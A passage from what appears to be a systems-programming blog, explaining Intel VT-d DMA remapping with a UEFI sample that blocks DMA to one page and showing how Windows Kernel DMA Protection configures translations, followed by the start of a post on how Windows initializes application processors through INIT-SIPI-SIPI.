<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgd9pJbhqX69RwA0c4jxT6U4Ha4espgujN5pqiUY7E0_aFtn3ceQuPRz2gZQA-qlGvEVvnVDPF20V7aZKH_2G6Dy9pjJyn43TIhJw3KzdBDeeFKCkqVPu2rrqThvIkQ2rfvpUtJskz8o8A/s1600/IMG_6433.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="459" data-original-width="1600" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgd9pJbhqX69RwA0c4jxT6U4Ha4espgujN5pqiUY7E0_aFtn3ceQuPRz2gZQA-qlGvEVvnVDPF20V7aZKH_2G6Dy9pjJyn43TIhJw3KzdBDeeFKCkqVPu2rrqThvIkQ2rfvpUtJskz8o8A/s640/IMG_6433.jpg" width="640" /></a></div>
<div>
</div>
<div>
Then, performing a DMA read with the test PCI device using <a href="https://github.com/ufrisk/pcileech" target="_blank">PCILeech</a> demonstrates that an unprotected page is readable,</div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHXq419hv-C2df9VLNXSXQbOdvoBm8svnf0kZNVPLDh85xu4UgRMFx59sgsrayKiaAodnrShUNOh_mTbxh0di-mMrLdtCnauUEp0LHjPHeXeNvfCZaD85XO94EOpb8z6kahXYUkbGi6sQ/s1600/Annotation+2020-05-17+101113.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="387" data-original-width="1578" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHXq419hv-C2df9VLNXSXQbOdvoBm8svnf0kZNVPLDh85xu4UgRMFx59sgsrayKiaAodnrShUNOh_mTbxh0di-mMrLdtCnauUEp0LHjPHeXeNvfCZaD85XO94EOpb8z6kahXYUkbGi6sQ/s640/Annotation+2020-05-17+101113.png" width="640" /></a></div>
<br /></div>
<div>
but the protected page is not.</div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgccge18d1G6e6rvk2IPWjkjpO93dMM8klnbhH5w-5qm4eDBzCxsppWgT3kFkh8WdXN1pDPQQ1Q17Lv6gagsyAwJIvOp9jLZ3UeS5TtqjeKLm7wAAgRxTMzJ-548K2hNvl3dr1r40Kvu9Q/s1600/2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="233" data-original-width="1455" height="100" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgccge18d1G6e6rvk2IPWjkjpO93dMM8klnbhH5w-5qm4eDBzCxsppWgT3kFkh8WdXN1pDPQQ1Q17Lv6gagsyAwJIvOp9jLZ3UeS5TtqjeKLm7wAAgRxTMzJ-548K2hNvl3dr1r40Kvu9Q/s640/2.png" width="640" /></a></div>
<br />
<span data-preserver-spaces="true" style="color: #0e101a; margin-bottom: 0pt; margin-top: 0pt;">By inspecting one of the reported fault-recording registers using </span><a class="_e75a791d-denali-editor-page-rtfLink" href="http://rweverything.com/" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; color: #4a6ee0; margin-bottom: 0pt; margin-top: 0pt;" target="_blank"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">RWEverything</span></a><span data-preserver-spaces="true" style="color: #0e101a; margin-bottom: 0pt; margin-top: 0pt;">, it can be confirmed that DMA was indeed blocked by a lack of read-permission.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGv7uod6jrD8tKzOktFrgrdSST2ZR5meC34DG8dHGV-TQG-LrpDwMLgbftVS0Z8NusENnFUGdMXw-2_2BUJ9tnbKk-eJL6ke5KaFpBolGIn6qyoLHJMNu-zSjNegIwkIBov6m-ML3yQbU/s1600/Annotation+2020-05-17+163029.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="370" data-original-width="1267" height="185" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGv7uod6jrD8tKzOktFrgrdSST2ZR5meC34DG8dHGV-TQG-LrpDwMLgbftVS0Z8NusENnFUGdMXw-2_2BUJ9tnbKk-eJL6ke5KaFpBolGIn6qyoLHJMNu-zSjNegIwkIBov6m-ML3yQbU/s640/Annotation+2020-05-17+163029.png" width="640" /></a></div>
<ul>
<li>The first column indicates the faulting address (0x6ff48000)</li>
<li>The third column indicates the source-id of the requesting device (Bus 6 : Device 0 : Function 0)</li>
<li>6 in the fourth column indicates the lack of read-permission.<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLarjhyphenhyphenf7zNn1SmfAvtahO9tYxPkUNm7LbzYcKfIW0EI-yTrl5Su52o3m7jXUk_u70sEbg-SjCDHhU7nBUlOCpGyBxm5R3M_QqhgAbH8d20AxuIMExzgBA_c4zafEu0mwvZ-gGFyxkpHU/s1600/Picture1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="417" data-original-width="961" height="273" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLarjhyphenhyphenf7zNn1SmfAvtahO9tYxPkUNm7LbzYcKfIW0EI-yTrl5Su52o3m7jXUk_u70sEbg-SjCDHhU7nBUlOCpGyBxm5R3M_QqhgAbH8d20AxuIMExzgBA_c4zafEu0mwvZ-gGFyxkpHU/s640/Picture1.png" width="640" /></a></div>
</li>
</ul>
<br /></div>
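<div>
The three fields read off the register above can also be extracted programmatically. The sketch below decodes one 128-bit fault recording register given as two 64-bit halves. The bit positions reflect my reading of the specification and should be checked against the revision you are using; FAULT_RECORD and DecodeFaultRecord are names invented for this example.</div>

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

// Hypothetical decoded view of one 128-bit fault recording register.
typedef struct {
    uint64_t FaultAddress;  // page-aligned address of the faulted request
    uint16_t SourceId;      // bus:device:function of the requesting device
    uint8_t  FaultReason;   // e.g. 5 = no write permission, 6 = no read permission
    bool     IsRead;        // type of the faulted request
    bool     Valid;         // F bit: the register holds a recorded fault
} FAULT_RECORD;

// Low holds bits 63:0 and High holds bits 127:64 of the register.
static FAULT_RECORD DecodeFaultRecord(uint64_t Low, uint64_t High)
{
    FAULT_RECORD record;
    record.FaultAddress = Low & ~0xFFFULL;                 // bits 63:12
    record.SourceId     = (uint16_t)(High & 0xFFFF);       // bits 79:64
    record.FaultReason  = (uint8_t)((High >> 32) & 0xFF);  // bits 103:96
    record.IsRead       = ((High >> 62) & 1) != 0;         // bit 126
    record.Valid        = ((High >> 63) & 1) != 0;         // bit 127
    return record;
}
```

<div>
With the values from the demo, a register whose low half is 0x6ff48000 and whose high half carries source-id 0x0600 and fault reason 6 decodes to a blocked read by Bus 6 : Device 0 : Function 0.</div>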
<div>
<h2>
Programming IOMMU </h2>
Enabling DMA remapping at a minimum can be divided into the following steps:<br />
<ol>
<li>Locating the DMA Remapping Reporting (DMAR) ACPI table.</li>
<li>Gathering information about the available DMA remapping hardware units from DMA-remapping hardware unit definition (DRHD) structures in (1).</li>
<li>Configuring translation by initializing the tables mentioned above. </li>
<li>Writing hardware registers to use (3) and activating DMA remapping.</li>
</ol>
</div>
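<div>
Steps (1) and (2) boil down to walking a list of variable-length structures. The following is a minimal sketch, not the code in HelloIommuPkg, that scans a DMAR table image already in memory and collects the register base address of each DRHD structure. How the table is located is left out, the function names are hypothetical, and the offsets (48-byte DMAR header, DRHD type 0, base address at offset 8) follow my reading of the specification.</div>

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define DMAR_HEADER_SIZE 48  // 36-byte ACPI header + width, flags, reserved
#define DMAR_TYPE_DRHD   0   // DMA-remapping hardware unit definition

// Reads a little-endian integer of the given size without relying on
// struct packing or host endianness.
static uint64_t ReadLe(const uint8_t *Bytes, size_t Size)
{
    uint64_t value = 0;
    for (size_t i = 0; i < Size; i++) {
        value |= (uint64_t)Bytes[i] << (8 * i);
    }
    return value;
}

// Collects the register base address of each DRHD in a DMAR table image.
// Returns the number of DRHD structures found; at most MaxBases are stored.
static size_t FindDrhdBases(const uint8_t *Dmar, uint64_t *Bases, size_t MaxBases)
{
    size_t tableLength = (size_t)ReadLe(Dmar + 4, 4);  // ACPI header Length
    size_t offset = DMAR_HEADER_SIZE;
    size_t count = 0;

    while (offset + 4 <= tableLength) {
        uint16_t type = (uint16_t)ReadLe(Dmar + offset, 2);
        uint16_t length = (uint16_t)ReadLe(Dmar + offset + 2, 2);
        if (length < 4 || offset + length > tableLength) {
            break;  // malformed structure; stop rather than run off the table
        }
        if (type == DMAR_TYPE_DRHD && length >= 16) {
            if (count < MaxBases) {
                Bases[count] = ReadLe(Dmar + offset + 8, 8);
            }
            count++;
        }
        offset += length;  // every structure carries its own length
    }
    return count;
}
```

<div>
Each returned base address is the start of the memory-mapped register set of one DMA remapping hardware unit, which is what step (4) writes to.</div>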
<div>
HelloIommuDxe.c roughly follows this sequence with some demonstration and error checking code. (1) and (2) are straightforward and can be validated with tools like RWEverything.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQoL1NCHZtbM-MQm6GMB3L0STuyM6iVaE4h6zr1rN-pqfCPWTXQu-5J36UFcWehPRhtgKjWDRJ4fsSiH3eBDupxbcg4mPnV2Ubl8G-1_-W6VOUGscmcTEH1XQCo6wvFKHsFzaoZPigJL0/s1600/dmar.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="896" data-original-width="1600" height="356" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQoL1NCHZtbM-MQm6GMB3L0STuyM6iVaE4h6zr1rN-pqfCPWTXQu-5J36UFcWehPRhtgKjWDRJ4fsSiH3eBDupxbcg4mPnV2Ubl8G-1_-W6VOUGscmcTEH1XQCo6wvFKHsFzaoZPigJL0/s640/dmar.jpg" width="640" /></a></div>
<br />
The complexity of (3) varies greatly depending on how granular and selective the translations and memory protections need to be. HelloIommuPkg allows any access from any device to anywhere, except to the single protected page, which simplifies this step. (4) is mostly just following the specification.<br />
<br />
Overall, the minimum steps are simple, and HelloIommuPkg is less than 700 lines of code excluding comments.<br />
<br /></div>
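<div>
To make the "allow everything except one page" idea in (3) concrete, here is a small sketch that fills a single 512-entry second-level page table with identity mappings and clears the read and write bits for one page. It is a simplification under stated assumptions: only the last-level table of one 2 MB region is shown, the names are invented for this example, and it is not necessarily how HelloIommuPkg lays out its tables.</div>

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

#define SL_READ      (1ULL << 0)            // DMA reads permitted
#define SL_WRITE     (1ULL << 1)            // DMA writes permitted
#define SL_ADDR_MASK 0x000FFFFFFFFFF000ULL  // 4 KB-aligned address bits
#define PAGE_SIZE_4K 0x1000ULL

// Builds a second-level page table entry for a 4 KB page.
static uint64_t MakeSlPte(uint64_t PhysicalAddress, bool AllowRead, bool AllowWrite)
{
    uint64_t entry = PhysicalAddress & SL_ADDR_MASK;
    if (AllowRead) {
        entry |= SL_READ;
    }
    if (AllowWrite) {
        entry |= SL_WRITE;
    }
    return entry;
}

// Identity-maps the 2 MB region starting at RegionBase with full access,
// except for ProtectedPage, which gets neither read nor write permission.
static void FillIdentityPt(uint64_t Pt[512], uint64_t RegionBase, uint64_t ProtectedPage)
{
    for (unsigned i = 0; i < 512; i++) {
        uint64_t address = RegionBase + i * PAGE_SIZE_4K;
        bool allow = (address != ProtectedPage);
        Pt[i] = MakeSlPte(address, allow, allow);
    }
}

// Mimics the permission check the hardware applies to a DMA read.
static bool DmaReadAllowed(const uint64_t Pt[512], uint64_t Address)
{
    return (Pt[(Address >> 12) & 0x1FF] & SL_READ) != 0;
}
```

<div>
With RegionBase 0x6fe00000 and ProtectedPage 0x6ff48000, a DMA read of 0x6ff48000 is rejected while the neighboring page at 0x6ff49000 remains readable, which matches the behavior seen in the demo.</div>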
<div>
<h2>
Use of DMA Remapping on Windows </h2>
Windows uses DMA remapping when available. If the system does not enable Kernel DMA Protection, it configures translations mostly to pass through all requests from all devices, with a few exceptions.<br />
<br />
The following screenshot taken from the system without Kernel DMA Protection shows translation for the DMA-capable device at Bus 7 : Device 0 : Function 0. The value 9 at the bottom right indicates DMA requests are passed through (See "TT: Translation Type" in the specification). <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQqcvUD1obJU-gahuQJCH0Lmveqg1wBSeEjzbafdexcKLd6s1FOvFD1eNOPC7oHAXFrwX7mO1l0n72mFBoCvBVS9q-osUBouJWa-4QuXwT6fz664fhlze3Es1YxqVwBc9E17-GHclk7gw/s1600/Inkedno_kdma_LI.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="753" data-original-width="1600" height="301" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQqcvUD1obJU-gahuQJCH0Lmveqg1wBSeEjzbafdexcKLd6s1FOvFD1eNOPC7oHAXFrwX7mO1l0n72mFBoCvBVS9q-osUBouJWa-4QuXwT6fz664fhlze3Es1YxqVwBc9E17-GHclk7gw/s640/Inkedno_kdma_LI.jpg" width="640" /></a></div>
<br />
Notice that most of the entries point to the same context table at 0x1ac000, which is configured for pass-through, providing no protection.<br />
<br />
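The reason 9 means pass-through can be seen by decoding the low bits of a context entry. The sketch below assumes that the 9 in the screenshot is the low part of the entry and uses the field positions as I understand them from the specification (bit 0 for Present, bits 3:2 for TT); the names are made up for this example.<br />

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

// Values of the TT (Translation Type) field of a context entry.
typedef enum {
    TtTranslate    = 0,  // 00b: requests are translated with second-level tables
    TtTranslateAll = 1,  // 01b: as above, and device-TLB requests are accepted
    TtPassThrough  = 2,  // 10b: requests bypass translation
    TtReserved     = 3   // 11b: reserved
} TRANSLATION_TYPE;

// Bit 0: the entry is present.
static bool ContextEntryPresent(uint64_t Low)
{
    return (Low & 1) != 0;
}

// Bits 3:2: how requests from the device are handled.
static TRANSLATION_TYPE ContextEntryTt(uint64_t Low)
{
    return (TRANSLATION_TYPE)((Low >> 2) & 3);
}

// Bits 63:12: address of the second-level page table root.
static uint64_t ContextEntrySlptPtr(uint64_t Low)
{
    return Low & ~0xFFFULL;
}
```

The value 9 is 1001b, that is, Present = 1 and TT = 10b, so ContextEntryTt(9) yields TtPassThrough.<br />
<br />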
As a side note, it would be technically possible for third-party Windows drivers to modify those translations and attempt to provide additional security against DMA unless VBS is enabled.<br />
<br />
<h2>
Use of DMA Remapping with Kernel DMA Protection</h2>
If Kernel DMA Protection is enabled, most of the translations are configured to fail. This is achieved by pointing to a second-level PML4 that is filled with zeros, meaning translations are not present.<br />
<br />
The below screenshot shows an example configuration with Kernel DMA Protection. Notice the context table at 0x1ac000 points to the second level PML4 at 0x251000, which is all zero.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5V2fLeiKbNBK_Tk9KV3hfW23-gzzz17V26laOyWxWOKVhdXmZ3NUcuebD3JCQbqZurDJhwZW4_01U8xMuUtI1SBdv4JSRdy_ZYKF8yCjwbwkElzFEEHlcuxSRolnoUv3KI1nJbhfkg_8/s1600/Inkedkdma2_LI.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="676" data-original-width="1600" height="270" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5V2fLeiKbNBK_Tk9KV3hfW23-gzzz17V26laOyWxWOKVhdXmZ3NUcuebD3JCQbqZurDJhwZW4_01U8xMuUtI1SBdv4JSRdy_ZYKF8yCjwbwkElzFEEHlcuxSRolnoUv3KI1nJbhfkg_8/s640/Inkedkdma2_LI.jpg" width="640" /></a></div>
<br />
Note that those memory locations are not visible if VBS is enabled. Disable it to inspect them.<br />
<br />
Interestingly, I was not able to observe the described behavior of Kernel DMA Protection, in that, regardless of whether the screen is locked, performing DMA against the device resulted in bug check 0xE6: DRIVER_VERIFIER_DMA_VIOLATION (type 0x26). From what I read from Hal.dll, it made sense to bug check, but I doubt this is how Kernel DMA Protection is supposed to protect the system.<br />
<br />
<h2>
Conclusion</h2>
DMA remapping is part of the Intel VT-d architecture, provides security against DMA from malicious devices, and can be enabled without using Intel VT-x. The sample project HelloIommuPkg demonstrates a simple setup of DMA remapping from UEFI with less than 700 lines of code.<br />
<br />
It is shown that Windows enables DMA remapping if available, and when the Kernel DMA Protection feature is enabled, DMA access is mostly blocked through the second-level PML4.<br />
<br /></div>
<div>
<h2>
Further Learning Resources</h2>
<ul>
<li><a href="https://software.intel.com/content/www/us/en/develop/download/intel-virtualization-technology-for-directed-io-architecture-specification.html">Intel® Virtualization Technology for Directed I/O Architecture Specification</a></li>
<li><a href="https://software.intel.com/sites/default/files/managed/8d/88/intel-whitepaper-using-iommu-for-dma-protection-in-uefi.pdf">A Tour Beyond BIOS: Using IOMMU for DMA Protection in UEFI Firmware</a></li>
<li><a href="https://github.com/tianocore/edk2-platforms/tree/master/Silicon/Intel/IntelSiliconPkg/Feature/VTd">VTd module in IntelSiliconPkg</a></li>
<li>Hal.dll, especially</li>
<ul>
<li>HalpIvtProcessDrhdEntry and ExtEnvRegisterIommu, which are responsible for the programming step (2). Those highlight the layout of the structure passed across many of the IOMMU-related functions. </li>
<li>IvtInitializeIommu (and HalpIommuInitializeAll), which is responsible for part of steps (3) and (4).</li>
<li>HalpIommuConfigureInterrupt, IvtSetMessageInterruptRouting and IvtHandleInterrupt for the implementation of translation fault reporting (ie, how bug check is initiated).</li>
<li>Highly recommended to study the specification before reading Hal.</li>
</ul>
</ul>
</div>
<div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBifGu8AOTqqJgp0wG5l7IidwF_VlzqWcW0BN9rT2yu_HcEt4OVO3PQ47k5Yc2oofUEVfGCK3LvMfRGQk83GUQWK6JH8OIQFrn7GfGl8ncBKhz6i2-Fg9nRHHSXYuydcmBnUxJwJgirj4/s1600/IMG_5580.JPG" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1200" data-original-width="1600" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBifGu8AOTqqJgp0wG5l7IidwF_VlzqWcW0BN9rT2yu_HcEt4OVO3PQ47k5Yc2oofUEVfGCK3LvMfRGQk83GUQWK6JH8OIQFrn7GfGl8ncBKhz6i2-Fg9nRHHSXYuydcmBnUxJwJgirj4/s320/IMG_5580.JPG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="font-size: 12.8px;">A cat protected from direct access.</td></tr>
</tbody></table>
</div>
Satoshi Tandahttp://www.blogger.com/profile/14201125639595582699noreply@blogger.com3tag:blogger.com,1999:blog-2937860723034111347.post-90270075213857343662020-03-20T06:17:00.000-07:002020-03-20T06:17:57.937-07:00Initializing Application Processors on WindowsThis post walks you through how application processors (APs) are started up on Windows. It can be read just for fun, but it can also help you make more sense of the sequence of INIT-SIPI-SIPI VM-exits you have to handle when writing a UEFI hypervisor.<br />
<br />
<h2>
AP Initialization and Overview of Its Implementation</h2>
<div>
<br /></div>
<div>
Before running any software code, hardware selects the processor that gets initialized and starts executing firmware code. This processor is called a bootstrap processor (BSP) and is basically the sole active processor until an operating system starts up the rest of the processors. </div>
<div>
<br />
The non-BSP processors are called APs and are initialized by the BSP sending a sequence of inter-processor interrupts (IPIs): INIT, Startup IPI, and the 2nd Startup IPI. This sequence is also referred to as INIT-SIPI-SIPI.</div>
<div>
<br /></div>
<div>
As noted in the previous post, a hypervisor that starts earlier than the operating system needs to handle VM-exits caused by those IPIs. But when exactly does that happen? </div>
<div>
<br /></div>
<div>
On Linux, this is relatively easy to find out. Searching "STARTUP IPI" in Linux source code or other developers' forums leads you to the implementation, <a href="https://elixir.bootlin.com/linux/latest/source/arch/x86/kernel/smpboot.c">smpboot.c</a>. On Windows 10, in short, this is done in HalpApicStartProcessor, which is reached from the kernel's KeStartAllProcessors. The stack trace is shown below: </div>
<div>
<br /></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">00 hal!HalpApicStartProcessor</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">01 hal!HalpInterruptStartProcessor</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">02 hal!HalStartNextProcessor</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">03 nt!KeStartAllProcessors</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">04 nt!Phase1InitializationDiscard</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">05 nt!Phase1Initialization</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">06 nt!PspSystemThreadStartup</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">07 nt!KiStartSystemThread</span>
</div>
<div>
<br /></div>
<div>
Let us look into this in a little more detail on Windows 19H1 (18362.1.amd64fre.19h1_release.190318-1202) without Hyper-V enabled. To be clear, the execution path varies drastically if Hyper-V is enabled.<br />
<br />
<h2>
High Level Flow</h2>
<br />
KeStartAllProcessors captures various system register values with KxInitializeProcessorState, updates per-processor bookkeeping data structures, and calls HalStartNextProcessor for each registered processor, one by one, to start all of them. </div>
<div>
<br /></div>
<div>
HalpInterruptStartProcessor builds the stub code and temporary data structures, such as page tables, a GDT, and an IDT, that APs need in order to go through real mode, 32-bit protected mode, and long mode. HalpLowStub (that is PROCESSOR_START_BLOCK according to <a href="http://alex-ionescu.com/publications/Recon/recon2017-bru.pdf" target="_blank">this talk by Alex Ionescu</a>) is the address where those are built and the very entry point of the AP. We will review the entry point code and how it makes its way up to the NT kernel. </div>
<div>
<br /></div>
<div>
After the stub is built, HalpInterruptStartProcessor executes HalpApicStartProcessor, which is responsible for issuing the INIT-SIPI-SIPI sequence. Pseudo code of this function is shown below.</div>
<div>
<br /></div>
<div>
<div style="background-color: #1e1e1e; color: #d4d4d4; font-family: Consolas, "Courier New", monospace; font-size: 12px; line-height: 16px; white-space: pre;">
NTSTATUS
<span style="color: #dcdcaa;">HalpApicStartProcessor</span>(
UINT64,
UINT32 <span style="color: #9cdcfe;">LocalApicId</span>,
UINT64,
UINT32 StartupIp
)
{
<span style="color: #6a9955;">//</span>
<span style="color: #6a9955;">// Assert INIT, then de-assert it. INIT-deassert IPI is done only for backward</span>
<span style="color: #6a9955;">// compatibility.</span>
<span style="color: #6a9955;">// See: 10.4.7.4 Local APIC State After It Receives an INIT-Deassert IPI</span>
<span style="color: #6a9955;">//</span>
<span style="color: #dcdcaa;">HalpApicWriteCommand</span>(LocalApicId, <span style="color: #b5cea8;">0xC500</span>); <span style="color: #6a9955;">// APIC_INT_LEVELTRIG | APIC_INT_ASSERT | APIC_DM_INIT</span>
<span style="color: #dcdcaa;">KeStallExecutionProcessor</span>(<span style="color: #b5cea8;">10u</span>);
<br />
<span style="color: #dcdcaa;">HalpApicWriteCommand</span>(LocalApicId, <span style="color: #b5cea8;">0x8500</span>); <span style="color: #6a9955;">// APIC_INT_LEVELTRIG | APIC_DM_INIT</span>
<span style="color: #dcdcaa;">KeStallExecutionProcessor</span>(<span style="color: #b5cea8;">200u</span>);
<br />
<span style="color: #6a9955;">//</span>
<span style="color: #6a9955;">// Compute the SIPI message value and send it.</span>
<span style="color: #6a9955;">// "the SIPI message contains a vector to the BIOS AP initialization code (at</span>
<span style="color: #6a9955;">// 000VV000H, where VV is the vector contained in the SIPI message)."</span>
<span style="color: #6a9955;">// See: 8.4.3 MP Initialization Protocol Algorithm for MP Systems</span>
<span style="color: #6a9955;">//</span>
UINT32 sipiMessage = ((StartupIp & <span style="color: #b5cea8;">0xFF000</span>) | <span style="color: #b5cea8;">0x600000u</span>) >> <span style="color: #b5cea8;">12</span>; <span style="color: #6a9955;">// APIC_DM_STARTUP | vector</span>
<span style="color: #dcdcaa;">HalpApicWriteCommand</span>(LocalApicId, sipiMessage);
<span style="color: #dcdcaa;">KeStallExecutionProcessor</span>(<span style="color: #b5cea8;">200u</span>);
<span style="color: #dcdcaa;">HalpApicWaitForCommand</span>();
<span style="color: #dcdcaa;">KeStallExecutionProcessor</span>(<span style="color: #b5cea8;">100u</span>);
<br />
<span style="color: #6a9955;">//</span>
<span style="color: #6a9955;">// Send the 2nd startup IPI.</span>
<span style="color: #6a9955;">//</span>
<span style="color: #dcdcaa;">HalpApicWriteCommand</span>(LocalApicId, sipiMessage);
<span style="color: #dcdcaa;">KeStallExecutionProcessor</span>(<span style="color: #b5cea8;">200u</span>);
}
</div>
</div>
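<div>
The magic numbers in the pseudo code can be rebuilt from the individual bits of the local APIC interrupt command register. The following sketch does that and also shows how the startup address and the SIPI vector map to each other. The constant names follow the comments in the pseudo code above; the helper function names are invented for this example, and 0x13000 below is only an example address.</div>

```c
#include <assert.h>
#include <stdint.h>

// Fields in the low dword of the local APIC interrupt command register.
#define APIC_DM_INIT       (5u << 8)   // delivery mode 101b: INIT
#define APIC_DM_STARTUP    (6u << 8)   // delivery mode 110b: Start-up
#define APIC_INT_ASSERT    (1u << 14)  // level: assert
#define APIC_INT_LEVELTRIG (1u << 15)  // trigger mode: level

// Command value for the INIT assert IPI.
static uint32_t InitAssertCommand(void)
{
    return APIC_INT_LEVELTRIG | APIC_INT_ASSERT | APIC_DM_INIT;
}

// Command value for the INIT de-assert IPI.
static uint32_t InitDeassertCommand(void)
{
    return APIC_INT_LEVELTRIG | APIC_DM_INIT;
}

// Builds the SIPI command for a 4 KB-aligned startup address below 1 MB.
static uint32_t SipiCommand(uint32_t StartupIp)
{
    assert((StartupIp & 0xFFF) == 0 && StartupIp < 0x100000);
    return APIC_DM_STARTUP | (StartupIp >> 12);
}

// Recovers the address the AP starts executing at (000VV000H).
static uint32_t SipiEntryAddress(uint32_t Command)
{
    return (Command & 0xFF) << 12;
}
```

<div>
InitAssertCommand() and InitDeassertCommand() evaluate to 0xC500 and 0x8500, the two values written in the pseudo code. For a stub placed at 0x13000, SipiCommand would produce 0x613, that is, vector 0x13 with the Start-up delivery mode.</div>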
<div>
<br /></div>
<div>
Note that those HalpApic functions are function pointers that are set for APIC or x2APIC according to the system configuration.</div>
<div>
<br /></div>
<div>
Then let us review how APs get initialized by following the stub code.</div>
<div>
<br /></div>
<div>
<h2>
AP Initialization Code</h2>
<h3>
HalpRMStub - Real-Mode </h3>
</div>
<div>
<br /></div>
<div>
The entry point code is symbolized as HalpRMStub. As the name suggests, it runs in real mode right after the SIPI. As seen in the screenshot below, the stub code sets CR0.PE (0x1), enabling protected mode, and jumps out to somewhere.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNdKo6-TnYFTWRYM_HxMgJBlHpT0RDuG4nEHcoWQN60Mo7SqyqjN_lOppagqcbsue6h1HIJQbCLMKhgkilhoCoYvYLWrgDbSNeABIFWV29oLQpswODCbFwtnGecW58Kh9TW2wCUt9oq3U/s1600/Annotation+2020-02-24+190219.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="938" data-original-width="1600" height="233" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNdKo6-TnYFTWRYM_HxMgJBlHpT0RDuG4nEHcoWQN60Mo7SqyqjN_lOppagqcbsue6h1HIJQbCLMKhgkilhoCoYvYLWrgDbSNeABIFWV29oLQpswODCbFwtnGecW58Kh9TW2wCUt9oq3U/s400/Annotation+2020-02-24+190219.png" width="400" /></a></div>
<div>
<br /></div>
<div>
As it is 16-bit code, the instructions shown by WinDbg are slightly broken. Below is the correct output.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6KPl7UT4nDLXlq33a0QemoRJ7wT1_EiJIp8HOuW66sX7xUDaFRwlBxfV6hvSfr6kWhOJKFCls7MzIQxD9iNYKe2wmu821aZCVStsnn-TpbuVVe_K6ITDIyBVdc8BCJKNsrk7qBApJEhc/s1600/Annotation+2020-02-24+190629.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="291" data-original-width="1395" height="81" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6KPl7UT4nDLXlq33a0QemoRJ7wT1_EiJIp8HOuW66sX7xUDaFRwlBxfV6hvSfr6kWhOJKFCls7MzIQxD9iNYKe2wmu821aZCVStsnn-TpbuVVe_K6ITDIyBVdc8BCJKNsrk7qBApJEhc/s400/Annotation+2020-02-24+190629.png" width="400" /></a></div>
<div>
<br />
Also, let us switch to physical addresses since the code runs in the real-mode.</div>
<div>
<div class="separator" style="clear: both; text-align: center;">
